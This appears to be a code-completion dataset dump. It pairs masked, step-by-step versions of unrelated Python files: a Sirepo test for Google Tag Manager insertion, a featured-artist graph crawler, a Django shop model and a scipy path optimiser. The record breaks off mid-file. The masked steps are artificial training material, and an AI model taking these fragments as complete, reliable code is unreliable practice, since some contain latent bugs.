"step-1": "<mask token>\n\n\ndef test_injection(fc):\n from pykern import pkcompat, pkunit\n from pykern.pkdebug import pkdc, pkdp, pkdlog\n from pykern.pkunit import pkeq, pkok, pkre\n import re\n r = fc.get('myapp')\n pkok(not re.search('googletag', pkcompat.from_bytes(r.data)),\n 'Unexpected injection of googletag data={}', r.data)\n r = fc.get('/en/landing.html')\n pkre(_TEST_ID, pkcompat.from_bytes(r.data))\n",
"step-2": "<mask token>\n\n\ndef setup_module(module):\n os.environ.update(SIREPO_SERVER_GOOGLE_TAG_MANAGER_ID=_TEST_ID)\n\n\ndef test_injection(fc):\n from pykern import pkcompat, pkunit\n from pykern.pkdebug import pkdc, pkdp, pkdlog\n from pykern.pkunit import pkeq, pkok, pkre\n import re\n r = fc.get('myapp')\n pkok(not re.search('googletag', pkcompat.from_bytes(r.data)),\n 'Unexpected injection of googletag data={}', r.data)\n r = fc.get('/en/landing.html')\n pkre(_TEST_ID, pkcompat.from_bytes(r.data))\n",
"step-3": "<mask token>\n_TEST_ID = '__NO_SUCH_STRING_IN_PAGE__'\n\n\ndef setup_module(module):\n os.environ.update(SIREPO_SERVER_GOOGLE_TAG_MANAGER_ID=_TEST_ID)\n\n\ndef test_injection(fc):\n from pykern import pkcompat, pkunit\n from pykern.pkdebug import pkdc, pkdp, pkdlog\n from pykern.pkunit import pkeq, pkok, pkre\n import re\n r = fc.get('myapp')\n pkok(not re.search('googletag', pkcompat.from_bytes(r.data)),\n 'Unexpected injection of googletag data={}', r.data)\n r = fc.get('/en/landing.html')\n pkre(_TEST_ID, pkcompat.from_bytes(r.data))\n",
"step-4": "<mask token>\nfrom __future__ import absolute_import, division, print_function\nimport pytest\nimport os\n_TEST_ID = '__NO_SUCH_STRING_IN_PAGE__'\n\n\ndef setup_module(module):\n os.environ.update(SIREPO_SERVER_GOOGLE_TAG_MANAGER_ID=_TEST_ID)\n\n\ndef test_injection(fc):\n from pykern import pkcompat, pkunit\n from pykern.pkdebug import pkdc, pkdp, pkdlog\n from pykern.pkunit import pkeq, pkok, pkre\n import re\n r = fc.get('myapp')\n pkok(not re.search('googletag', pkcompat.from_bytes(r.data)),\n 'Unexpected injection of googletag data={}', r.data)\n r = fc.get('/en/landing.html')\n pkre(_TEST_ID, pkcompat.from_bytes(r.data))\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"Test(s) for static files\n\n:copyright: Copyright (c) 2019 RadiaSoft LLC. All Rights Reserved.\n:license: http://www.apache.org/licenses/LICENSE-2.0.html\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\nimport pytest\nimport os\n\n_TEST_ID = '__NO_SUCH_STRING_IN_PAGE__'\n\n\ndef setup_module(module):\n os.environ.update(\n SIREPO_SERVER_GOOGLE_TAG_MANAGER_ID=_TEST_ID,\n )\n\n\ndef test_injection(fc):\n from pykern import pkcompat, pkunit\n from pykern.pkdebug import pkdc, pkdp, pkdlog\n from pykern.pkunit import pkeq, pkok, pkre\n import re\n\n # test non-static page\n r = fc.get('myapp')\n pkok(\n not re.search(\n r'googletag',\n pkcompat.from_bytes(r.data)\n ),\n 'Unexpected injection of googletag data={}',\n r.data\n )\n\n # test successful injection\n r = fc.get('/en/landing.html')\n pkre(_TEST_ID, pkcompat.from_bytes(r.data))\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import dataset
import json
import gc
import os
jsonDir = "/home/jr/share/python/music-visualizer/merged"
db = dataset.connect('sqlite:///test.db')
table = db['Songs']
for root, subFolders, files in os.walk(jsonDir):
for f in files:
print("file:{}".format(f))
gc.collect()
tmpJson = json.load(open(os.path.join(root, f)))
for Artist in tmpJson:
for song in tmpJson[Artist]["Songs"]:
table.insert(song)
import urllib2
import json
import re
#in_artist
def byteify(input):
if isinstance(input, dict):
return {byteify(key): byteify(value) for key, value in input.iteritems()}
elif isinstance(input, list):
return [byteify(element) for element in input]
elif isinstance(input, unicode):
return input.encode('utf-8')
else:
return input
nodes = []
edges = []
anchor = "Rihanna"
q = [anchor]
while len(q) > 0:
art = q.pop(0)
#get song list
url = "http://10.104.246.185:5000/artist/"+art.replace(" ", "%20")
response = urllib2.urlopen(url)
dictionary = byteify(json.loads(response.read()))
songlist = []
if (dictionary):
lst = dictionary["Songs"]
for song in lst:
songlist.append(song["Title"])
for song in songlist:
#get string of featured artists
m = re.match('.+[fF]eat. ([^)(/]+)', song)
if m:
s = m.group(1)
#split into artists
lst = s.split(",")
lstend = (lst.pop()).split("&")
lst.extend(lstend)
for a in lst:
a = a.strip()
edges.append((art.strip(),a))
if nodes.count(a) == 0:
q.append(a)
for b in lst:
b = b.strip()
if a != b:
edges.append((a,b))
if nodes.count(art) == 0:
nodes.append(art.strip())
i = 0
j = 0
while i < len(edges)-1:
j = i+1
t1 = edges[i]
while j < len(edges):
t2 = edges[j]
if t1[0] == t2[0] and t1[1] == t2[1]:
edges.pop(j)
elif t1[1] == t2[0] and t1[0] == t2[1]:
edges.pop(j)
elif t2[0] == t2[1]:
edges.pop(j)
else:
j = j + 1
i = i + 1
print nodes
print edges
|
normal
|
{
"blob_id": "3461e9dceb2c0bfc49002809154f8be4cd8c66e2",
"index": 1483,
"step-1": "import dataset\nimport json\nimport gc\nimport os\n\njsonDir = \"/home/jr/share/python/music-visualizer/merged\"\n\ndb = dataset.connect('sqlite:///test.db')\ntable = db['Songs']\n\nfor root, subFolders, files in os.walk(jsonDir):\n for f in files:\n print(\"file:{}\".format(f))\n gc.collect()\n tmpJson = json.load(open(os.path.join(root, f)))\n for Artist in tmpJson:\n for song in tmpJson[Artist][\"Songs\"]:\n table.insert(song)\nimport urllib2\nimport json\nimport re\n#in_artist\ndef byteify(input):\n if isinstance(input, dict):\n return {byteify(key): byteify(value) for key, value in input.iteritems()}\n elif isinstance(input, list):\n return [byteify(element) for element in input]\n elif isinstance(input, unicode):\n return input.encode('utf-8')\n else:\n return input\n\nnodes = []\nedges = []\n\nanchor = \"Rihanna\"\n\nq = [anchor]\n\nwhile len(q) > 0:\n art = q.pop(0)\n #get song list\n url = \"http://10.104.246.185:5000/artist/\"+art.replace(\" \", \"%20\")\n response = urllib2.urlopen(url)\n dictionary = byteify(json.loads(response.read()))\n songlist = []\n if (dictionary):\n lst = dictionary[\"Songs\"]\n for song in lst:\n songlist.append(song[\"Title\"])\n for song in songlist:\n #get string of featured artists\n m = re.match('.+[fF]eat. ([^)(/]+)', song) \n if m:\n s = m.group(1)\n #split into artists\n lst = s.split(\",\")\n lstend = (lst.pop()).split(\"&\")\n lst.extend(lstend)\n for a in lst:\n a = a.strip()\n edges.append((art.strip(),a))\n if nodes.count(a) == 0:\n q.append(a)\n for b in lst:\n b = b.strip()\n if a != b:\n edges.append((a,b))\n\n if nodes.count(art) == 0:\n nodes.append(art.strip())\n\ni = 0\nj = 0\nwhile i < len(edges)-1:\n j = i+1\n t1 = edges[i]\n while j < len(edges):\n t2 = edges[j]\n if t1[0] == t2[0] and t1[1] == t2[1]:\n edges.pop(j)\n elif t1[1] == t2[0] and t1[0] == t2[1]:\n edges.pop(j)\n elif t2[0] == t2[1]:\n edges.pop(j)\n else:\n j = j + 1\n \n i = i + 1\nprint nodes\nprint edges\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
permissions = ('restart', )
commands = ('restart', )
def get_command(session, parsed_message):
return 'stop', 'restart'
def parse_response(permission, response):
return response
|
normal
|
{
"blob_id": "acd5cf675522c90fc9fbc96bdeb52f66835626b4",
"index": 3489,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef parse_response(permission, response):\n return response\n",
"step-3": "<mask token>\n\n\ndef get_command(session, parsed_message):\n return 'stop', 'restart'\n\n\ndef parse_response(permission, response):\n return response\n",
"step-4": "permissions = 'restart',\ncommands = 'restart',\n\n\ndef get_command(session, parsed_message):\n return 'stop', 'restart'\n\n\ndef parse_response(permission, response):\n return response\n",
"step-5": "permissions = ('restart', )\ncommands = ('restart', )\n\n\ndef get_command(session, parsed_message):\n return 'stop', 'restart'\n\n\ndef parse_response(permission, response):\n return response\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django.db import models
import string
import random
def id_generator(size=32, chars=string.ascii_uppercase + string.digits):
exists = True
while exists == True:
ran = ''.join(random.choice(chars) for _ in range(size))
if len(Item.objects.filter(random_str=ran)) == 0:
exists = False
return ran
# Create your models here.
class Item(models.Model):
name = models.CharField(max_length=999, unique=True)
description = models.TextField(blank=True)
random_str = models.CharField(max_length=999, default=id_generator)
original_price = models.FloatField()
markup_percentage = models.PositiveIntegerField(default=120)
price = models.FloatField(blank=True)
discount_percentage = models.PositiveIntegerField(default=0)
#TODO suurused
img = models.ImageField()
img_2 = models.ImageField(null=True, blank=True)
img_3 = models.ImageField(null=True, blank=True)
img_4 = models.ImageField(null=True, blank=True)
def save(self, *args, **kwargs):
if self.price is None:
self.price = self.original_price * self.markup_percentage / 100
super(Item, self).save(*args, **kwargs)
def __str__(self):
if self.discount_percentage == 0:
return self.name + " - " + str(self.price) + "€"
else:
return self.name + " - " + str( self.price*((100-self.discount_percentage)/100) ) + "€ - DISCOUNT " + str(self.discount_percentage) + "%"
|
normal
|
{
"blob_id": "efba815fe64cddb5315b17b2cbaf1d3fc38c11ee",
"index": 4995,
"step-1": "<mask token>\n\n\nclass Item(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def save(self, *args, **kwargs):\n if self.price is None:\n self.price = self.original_price * self.markup_percentage / 100\n super(Item, self).save(*args, **kwargs)\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Item(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def save(self, *args, **kwargs):\n if self.price is None:\n self.price = self.original_price * self.markup_percentage / 100\n super(Item, self).save(*args, **kwargs)\n\n def __str__(self):\n if self.discount_percentage == 0:\n return self.name + ' - ' + str(self.price) + '€'\n else:\n return self.name + ' - ' + str(self.price * ((100 - self.\n discount_percentage) / 100)) + '€ - DISCOUNT ' + str(self.\n discount_percentage) + '%'\n",
"step-3": "<mask token>\n\n\nclass Item(models.Model):\n name = models.CharField(max_length=999, unique=True)\n description = models.TextField(blank=True)\n random_str = models.CharField(max_length=999, default=id_generator)\n original_price = models.FloatField()\n markup_percentage = models.PositiveIntegerField(default=120)\n price = models.FloatField(blank=True)\n discount_percentage = models.PositiveIntegerField(default=0)\n img = models.ImageField()\n img_2 = models.ImageField(null=True, blank=True)\n img_3 = models.ImageField(null=True, blank=True)\n img_4 = models.ImageField(null=True, blank=True)\n\n def save(self, *args, **kwargs):\n if self.price is None:\n self.price = self.original_price * self.markup_percentage / 100\n super(Item, self).save(*args, **kwargs)\n\n def __str__(self):\n if self.discount_percentage == 0:\n return self.name + ' - ' + str(self.price) + '€'\n else:\n return self.name + ' - ' + str(self.price * ((100 - self.\n discount_percentage) / 100)) + '€ - DISCOUNT ' + str(self.\n discount_percentage) + '%'\n",
"step-4": "from django.db import models\nimport string\nimport random\n\n\ndef id_generator(size=32, chars=string.ascii_uppercase + string.digits):\n exists = True\n while exists == True:\n ran = ''.join(random.choice(chars) for _ in range(size))\n if len(Item.objects.filter(random_str=ran)) == 0:\n exists = False\n return ran\n\n\nclass Item(models.Model):\n name = models.CharField(max_length=999, unique=True)\n description = models.TextField(blank=True)\n random_str = models.CharField(max_length=999, default=id_generator)\n original_price = models.FloatField()\n markup_percentage = models.PositiveIntegerField(default=120)\n price = models.FloatField(blank=True)\n discount_percentage = models.PositiveIntegerField(default=0)\n img = models.ImageField()\n img_2 = models.ImageField(null=True, blank=True)\n img_3 = models.ImageField(null=True, blank=True)\n img_4 = models.ImageField(null=True, blank=True)\n\n def save(self, *args, **kwargs):\n if self.price is None:\n self.price = self.original_price * self.markup_percentage / 100\n super(Item, self).save(*args, **kwargs)\n\n def __str__(self):\n if self.discount_percentage == 0:\n return self.name + ' - ' + str(self.price) + '€'\n else:\n return self.name + ' - ' + str(self.price * ((100 - self.\n discount_percentage) / 100)) + '€ - DISCOUNT ' + str(self.\n discount_percentage) + '%'\n",
"step-5": "from django.db import models\nimport string\nimport random\n\ndef id_generator(size=32, chars=string.ascii_uppercase + string.digits):\n\texists = True\n\twhile exists == True:\n\t\tran = ''.join(random.choice(chars) for _ in range(size))\n\t\tif len(Item.objects.filter(random_str=ran)) == 0:\n\t\t\texists = False\n\n\treturn ran\n\n\n\n# Create your models here.\nclass Item(models.Model):\n\tname = models.CharField(max_length=999, unique=True)\n\tdescription = models.TextField(blank=True)\n\trandom_str = models.CharField(max_length=999, default=id_generator)\n\n\toriginal_price = models.FloatField()\n\tmarkup_percentage = models.PositiveIntegerField(default=120)\n\tprice = models.FloatField(blank=True) \n\tdiscount_percentage = models.PositiveIntegerField(default=0)\n\n#TODO suurused\n\n\n\timg = models.ImageField()\n\timg_2 = models.ImageField(null=True, blank=True)\n\timg_3 = models.ImageField(null=True, blank=True)\n\timg_4 = models.ImageField(null=True, blank=True)\n\n\tdef save(self, *args, **kwargs):\n\t\tif self.price is None:\n\t\t\tself.price = self.original_price * self.markup_percentage / 100\n\t\tsuper(Item, self).save(*args, **kwargs)\n\n\tdef __str__(self):\n\t\tif self.discount_percentage == 0:\n\t\t\treturn self.name + \" - \" + str(self.price) + \"€\"\n\t\telse:\n\t\t\treturn self.name + \" - \" + str( self.price*((100-self.discount_percentage)/100) ) + \"€ - DISCOUNT \" + str(self.discount_percentage) + \"%\"",
"step-ids": [
2,
3,
4,
6,
7
]
}
|
[
2,
3,
4,
6,
7
] |
from erlport.erlterms import Atom
from scipy.optimize import basinhopping
import numpy as np
import qsim
class Bounds(object):
'''Required for acceptance testing in scipy.optimize.basinhopping'''
def __init__(self, xmin, xmax, costs):
self.xmax = xmax
self.xmin = xmin
self.costs = costs
def is_valid(self, x):
tmax = bool(np.all(x <= self.xmax))
tmin = bool(np.all(x >= self.xmin))
in_order = [x[i] + c <= x[i+1] for i, c in enumerate(self.costs[1:])]
in_order.append(x[0] <= self.costs[0])
return tmax and tmin and all(in_order)
def __call__(self, **kwargs):
x = kwargs["x_new"]
return self.is_valid(x)
def SLSQP_constraints(self):
'''Return inequality constraints for SLSQP,
in particular, assert that 0 >= x_i - x_i-1 forall i'''
funs = [lambda x: x[i + 1] - x[i] + c
for i, c in enumerate(self.costs[1:])]
funs.append(lambda x: x[0] + self.costs[0])
funs += [lambda x: x[i] for i in xrange(len(self.costs))]
funs += [lambda x: -x[i]]
# im matrix form
n = len(self.costs)
# -x_i <= 0
neg = np.identity(n) * -1
rhs1 = np.ones(n) * self.xmin
rhs1[0] += self.costs[0]
# tmax constraints
tmax = np.identity(n)
rhs2 = np.ones(n) * self.xmax
# cost constraints
A = np.vstack((neg, tmax))
b = np.hstack((rhs1, rhs2))
if n >= 2:
root = [1, -1] + [0] * (n - 2)
z = np.vstack([np.roll(root, i) for i in xrange(n-1)])
rhs3 = np.array(self.costs[1:])
A = np.vstack((A, z))
b = np.hstack((b, rhs3))
return {"slsqp": {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)},
"cobyla": [{'type': 'ineq', 'fun': f} for f in funs]}
def SLSQP_bounds(self):
'''Return bounds as sequence'''
return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]
class Stepper(object):
def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):
self.bounds = bounds
self.stepsize = stepsize
self.max_iter = max_iter
self.deflate = deflate
def __call__(self, x):
y = None
for i in xrange(self.max_iter):
B = self.deflate ** (i + 1)
r = self.stepsize * B
u = np.random.uniform(-r, r, x.shape)
if self.bounds.is_valid(x + u):
x += u
return x
return x
def optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):
'''Erlang Entry Point to Optimization Module'''
B_table = parse_behaviours(behaviours)
BTG = parse_edgelist(btg)
F = parse_prediction(prediction)
path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=10)
return list(path), map(lambda x: int(x) + start, t.x)
def best_path(paths, Behaviour_Table, BTG, F, dt=1.,
maxiter=20, Acc0=None, method="SLSQP"):
'''
Perform the mixed ILP optimization (without queues, or memory), that yields
the optimal behaviour transition through the BTG.
:paths -> iterable of path-iterables, path-domain for optimization
Each path-iterable contains only behaviour_id.
:Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}
Must contain all behaviours in btg
:btg -> Behaviour Transition Graph, nodes are behaviour_ids,
dictionary of the form {(v_1, v_2): tau_1,2}
:F -> Prediction matrix, of shape (|b_vec|, n),
where n is int(T_max/dt)
:dt -> Prediction time-resolution
:Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.
'''
# Given a particular path, find the optimal times to transition
Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0
Solutions = []
t_max = int((F.shape[-1] - 1) * dt)
initial_T = F.sum() / len(paths[0])
for path in paths:
L, x0, bounds, step_taker = opt_params(path, Behaviour_Table,
BTG, t_max, F, dt=dt, Acc0=Acc0)
minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds(),
'constraints': bounds.SLSQP_constraints()[method.lower()],
}
result = basinhopping(L, x0.copy(),
accept_test=bounds,
take_step=step_taker, stepsize=10*dt,
niter=maxiter, T=initial_T,
interval=20,
minimizer_kwargs=minimizer_kwargs)
Solutions.append(result)
i, BestPath = min(((i, s) for i, s in enumerate(Solutions)),
key=lambda x: x[1].fun)
return paths[i], BestPath
def opt_params(path, BTable, BTG, t_max, F, dt, Acc0,
q_acc_model=qsim.integrator, q_acc_model_args=[], q_model_kwargs={},
q_relief_model=qsim.linear_relief,
deadtime_penalty=4):
'''Generates the components necessary to completely specify
best-path optimization routine. (With a queue model)
Returns:
:Lagrangian Objective Function L(x) -> Contains a Barrier Component
:x0 -> an initial realizeable solution
:bounds -> a Bounds() object, that defines surrounding hyper-volume for x
'''
B = np.vstack(BTable[bid] for bid in path) # Behaviour Matrix (d,4)
taus = transition_costs(path, BTG)
x0 = initial_soln(path, t_max)
bounds = Bounds(0., (F.shape[-1] - 1) * dt, taus)
def cost(x, p=deadtime_penalty):
'''Simulate the queue effects, and then evaluate the objective function
on the simulation result'''
k = F.shape[1] if F.shape[1] > 0 else 1
avg_rates = F.sum(1) / k
Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=BTable,
Acc0=Acc0, relief_mode_kwargs={"rate": 0.5})
cum_Z = np.cumsum(Z, axis=1)
Deadtimes = np.where(Z == 0, 0, 1).sum(1)
return (-obj(x, B, cum_Z, taus, dt=dt)
+ 0.25* avg_rates.dot(Deadtimes) ** 2
- avg_rates.sum()*Acc.sum()) # ????
step_taker = Stepper(bounds, 10, 20)
return cost, x0, bounds, step_taker
# Parsers ###############################################################
def parse_edgelist(edges):
'''[((a, b), tau)] -> {(a, b): tau}'''
return {(a, b): tau for (a, b), tau in edges}
def parse_behaviours(behaviours, dtype=np.float32):
'''[(bid, [bvec])] -> {bid: <bvec>}'''
return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}
def parse_prediction(F):
'''[[float]] -> np.array(...) of same shape'''
return np.array(F) # Might not work, will check back later
# Optimization ###############################################################
def initial_soln(path, t_max):
'''Evenly Distributed, no check for taus'''
j = t_max / len(path)
return np.array([(i + 1) * j for i in xrange(len(path) - 1)])
def transition_costs(path, btg):
'''Sequence of transition costs associated with the prescribed path'''
return [btg[(path[i], path[i+1])] for i in xrange(len(path) - 1)]
def range_sum(cum_F, a, b, penalty=-1000):
'''Penalty brutally dominates any out-of-index operation...'''
z = cum_F.shape[-1] - 1
if (not 0 <= a <= z) or (not 0 <= b <= z):
return np.ones(cum_F.shape[0]) * penalty
return cum_F[..., b] - cum_F[..., a]
def flow_served(cum_F, times, costs, queue_model=None, dt=1.):
'''Times: [t1, ..., td],
costs: [t_{b0, b1}, t_{b1, b2}, ...]
Returns the Fulfillment matrix associated with each behaviour segment.'''
discr_index = lambda x: int(x / dt) - 1
t_steps = [0] + map(discr_index, times)
t_steps.append(cum_F.shape[-1] - 1) # t_max
c_steps = [0] + map(discr_index, costs)
result = np.vstack([range_sum(cum_F, t_steps[i] + c_steps[i], t_steps[i + 1])
for i in xrange(len(costs) + 1)])
return result
def obj(times, B, cum_F, costs, dt=1.):
'''Objective Function for Hillclimbing'''
Z = B * flow_served(cum_F, times, costs, dt=dt)
return Z.sum()
def barrier(times, path, BTG):
'''Handles Linear/causality Constraints with respect to transitions'''
t = [0] + list(times)
S = 0.
for i in xrange(len(path) - 1):
edge = (path[i], path[i + 1])
tau = BTG[edge]
S += min(0, (t[i + 1] - t[i] - tau)) # Only accrue if constraint is voilated
return S
|
normal
|
{
"blob_id": "0f4bdaecef356e01cbef527d4886564d9ef840fa",
"index": 5573,
"step-1": "<mask token>\n\n\nclass Bounds(object):\n \"\"\"Required for acceptance testing in scipy.optimize.basinhopping\"\"\"\n\n def __init__(self, xmin, xmax, costs):\n self.xmax = xmax\n self.xmin = xmin\n self.costs = costs\n\n def is_valid(self, x):\n tmax = bool(np.all(x <= self.xmax))\n tmin = bool(np.all(x >= self.xmin))\n in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs\n [1:])]\n in_order.append(x[0] <= self.costs[0])\n return tmax and tmin and all(in_order)\n\n def __call__(self, **kwargs):\n x = kwargs['x_new']\n return self.is_valid(x)\n\n def SLSQP_constraints(self):\n \"\"\"Return inequality constraints for SLSQP,\n in particular, assert that 0 >= x_i - x_i-1 forall i\"\"\"\n funs = [(lambda x: x[i + 1] - x[i] + c) for i, c in enumerate(self.\n costs[1:])]\n funs.append(lambda x: x[0] + self.costs[0])\n funs += [(lambda x: x[i]) for i in xrange(len(self.costs))]\n funs += [lambda x: -x[i]]\n n = len(self.costs)\n neg = np.identity(n) * -1\n rhs1 = np.ones(n) * self.xmin\n rhs1[0] += self.costs[0]\n tmax = np.identity(n)\n rhs2 = np.ones(n) * self.xmax\n A = np.vstack((neg, tmax))\n b = np.hstack((rhs1, rhs2))\n if n >= 2:\n root = [1, -1] + [0] * (n - 2)\n z = np.vstack([np.roll(root, i) for i in xrange(n - 1)])\n rhs3 = np.array(self.costs[1:])\n A = np.vstack((A, z))\n b = np.hstack((b, rhs3))\n return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)\n }, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}\n\n def SLSQP_bounds(self):\n \"\"\"Return bounds as sequence\"\"\"\n return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]\n\n\nclass Stepper(object):\n\n def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):\n self.bounds = bounds\n self.stepsize = stepsize\n self.max_iter = max_iter\n self.deflate = deflate\n\n def __call__(self, x):\n y = None\n for i in xrange(self.max_iter):\n B = self.deflate ** (i + 1)\n r = self.stepsize * B\n u = np.random.uniform(-r, r, x.shape)\n if self.bounds.is_valid(x + u):\n x += u\n return x\n return x\n\n\n<mask token>\n\n\ndef best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,\n method='SLSQP'):\n \"\"\"\n Perform the mixed ILP optimization (without queues, or memory), that yields\n the optimal behaviour transition through the BTG.\n\n :paths -> iterable of path-iterables, path-domain for optimization\n Each path-iterable contains only behaviour_id.\n :Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}\n Must contain all behaviours in btg\n :btg -> Behaviour Transition Graph, nodes are behaviour_ids,\n dictionary of the form {(v_1, v_2): tau_1,2}\n :F -> Prediction matrix, of shape (|b_vec|, n),\n where n is int(T_max/dt)\n :dt -> Prediction time-resolution\n :Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.\n \"\"\"\n Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0\n Solutions = []\n t_max = int((F.shape[-1] - 1) * dt)\n initial_T = F.sum() / len(paths[0])\n for path in paths:\n L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,\n t_max, F, dt=dt, Acc0=Acc0)\n minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds\n (), 'constraints': bounds.SLSQP_constraints()[method.lower()]}\n result = basinhopping(L, x0.copy(), accept_test=bounds, take_step=\n step_taker, stepsize=10 * dt, niter=maxiter, T=initial_T,\n interval=20, minimizer_kwargs=minimizer_kwargs)\n Solutions.append(result)\n i, BestPath = min(((i, s) for i, s in enumerate(Solutions)), key=lambda\n x: x[1].fun)\n return paths[i], BestPath\n\n\ndef opt_params(path, BTable, BTG, t_max, F, dt, Acc0, q_acc_model=qsim.\n integrator, q_acc_model_args=[], q_model_kwargs={}, q_relief_model=qsim\n .linear_relief, deadtime_penalty=4):\n \"\"\"Generates the components necessary to completely specify\n best-path optimization routine. (With a queue model)\n\n Returns:\n :Lagrangian Objective Function L(x) -> Contains a Barrier Component\n :x0 -> an initial realizeable solution\n :bounds -> a Bounds() object, that defines surrounding hyper-volume for x\n \"\"\"\n B = np.vstack(BTable[bid] for bid in path)\n taus = transition_costs(path, BTG)\n x0 = initial_soln(path, t_max)\n bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)\n\n def cost(x, p=deadtime_penalty):\n \"\"\"Simulate the queue effects, and then evaluate the objective function\n on the simulation result\"\"\"\n k = F.shape[1] if F.shape[1] > 0 else 1\n avg_rates = F.sum(1) / k\n Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=\n BTable, Acc0=Acc0, relief_mode_kwargs={'rate': 0.5})\n cum_Z = np.cumsum(Z, axis=1)\n Deadtimes = np.where(Z == 0, 0, 1).sum(1)\n return -obj(x, B, cum_Z, taus, dt=dt) + 0.25 * avg_rates.dot(Deadtimes\n ) ** 2 - avg_rates.sum() * Acc.sum()\n step_taker = Stepper(bounds, 10, 20)\n return cost, x0, bounds, step_taker\n\n\n<mask token>\n\n\ndef parse_behaviours(behaviours, dtype=np.float32):\n \"\"\"[(bid, [bvec])] -> {bid: <bvec>}\"\"\"\n return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}\n\n\ndef parse_prediction(F):\n \"\"\"[[float]] -> np.array(...) of same shape\"\"\"\n return np.array(F)\n\n\n<mask token>\n\n\ndef range_sum(cum_F, a, b, penalty=-1000):\n \"\"\"Penalty brutally dominates any out-of-index operation...\"\"\"\n z = cum_F.shape[-1] - 1\n if not 0 <= a <= z or not 0 <= b <= z:\n return np.ones(cum_F.shape[0]) * penalty\n return cum_F[..., b] - cum_F[..., a]\n\n\n<mask token>\n\n\ndef barrier(times, path, BTG):\n \"\"\"Handles Linear/causality Constraints with respect to transitions\"\"\"\n t = [0] + list(times)\n S = 0.0\n for i in xrange(len(path) - 1):\n edge = path[i], path[i + 1]\n tau = BTG[edge]\n S += min(0, t[i + 1] - t[i] - tau)\n return S\n",
"step-2": "<mask token>\n\n\nclass Bounds(object):\n \"\"\"Required for acceptance testing in scipy.optimize.basinhopping\"\"\"\n\n def __init__(self, xmin, xmax, costs):\n self.xmax = xmax\n self.xmin = xmin\n self.costs = costs\n\n def is_valid(self, x):\n tmax = bool(np.all(x <= self.xmax))\n tmin = bool(np.all(x >= self.xmin))\n in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs\n [1:])]\n in_order.append(x[0] <= self.costs[0])\n return tmax and tmin and all(in_order)\n\n def __call__(self, **kwargs):\n x = kwargs['x_new']\n return self.is_valid(x)\n\n def SLSQP_constraints(self):\n \"\"\"Return inequality constraints for SLSQP,\n in particular, assert that 0 >= x_i - x_i-1 forall i\"\"\"\n funs = [(lambda x: x[i + 1] - x[i] + c) for i, c in enumerate(self.\n costs[1:])]\n funs.append(lambda x: x[0] + self.costs[0])\n funs += [(lambda x: x[i]) for i in xrange(len(self.costs))]\n funs += [lambda x: -x[i]]\n n = len(self.costs)\n neg = np.identity(n) * -1\n rhs1 = np.ones(n) * self.xmin\n rhs1[0] += self.costs[0]\n tmax = np.identity(n)\n rhs2 = np.ones(n) * self.xmax\n A = np.vstack((neg, tmax))\n b = np.hstack((rhs1, rhs2))\n if n >= 2:\n root = [1, -1] + [0] * (n - 2)\n z = np.vstack([np.roll(root, i) for i in xrange(n - 1)])\n rhs3 = np.array(self.costs[1:])\n A = np.vstack((A, z))\n b = np.hstack((b, rhs3))\n return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)\n }, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}\n\n def SLSQP_bounds(self):\n \"\"\"Return bounds as sequence\"\"\"\n return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]\n\n\nclass Stepper(object):\n\n def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):\n self.bounds = bounds\n self.stepsize = stepsize\n self.max_iter = max_iter\n self.deflate = deflate\n\n def __call__(self, x):\n y = None\n for i in xrange(self.max_iter):\n B = self.deflate ** (i + 1)\n r = self.stepsize * B\n u = np.random.uniform(-r, r, x.shape)\n if self.bounds.is_valid(x + u):\n x += u\n return x\n return x\n\n\ndef optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):\n \"\"\"Erlang Entry Point to Optimization Module\"\"\"\n B_table = parse_behaviours(behaviours)\n BTG = parse_edgelist(btg)\n F = parse_prediction(prediction)\n path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=10)\n return list(path), map(lambda x: int(x) + start, t.x)\n\n\ndef best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,\n method='SLSQP'):\n \"\"\"\n Perform the mixed ILP optimization (without queues, or memory), that yields\n the 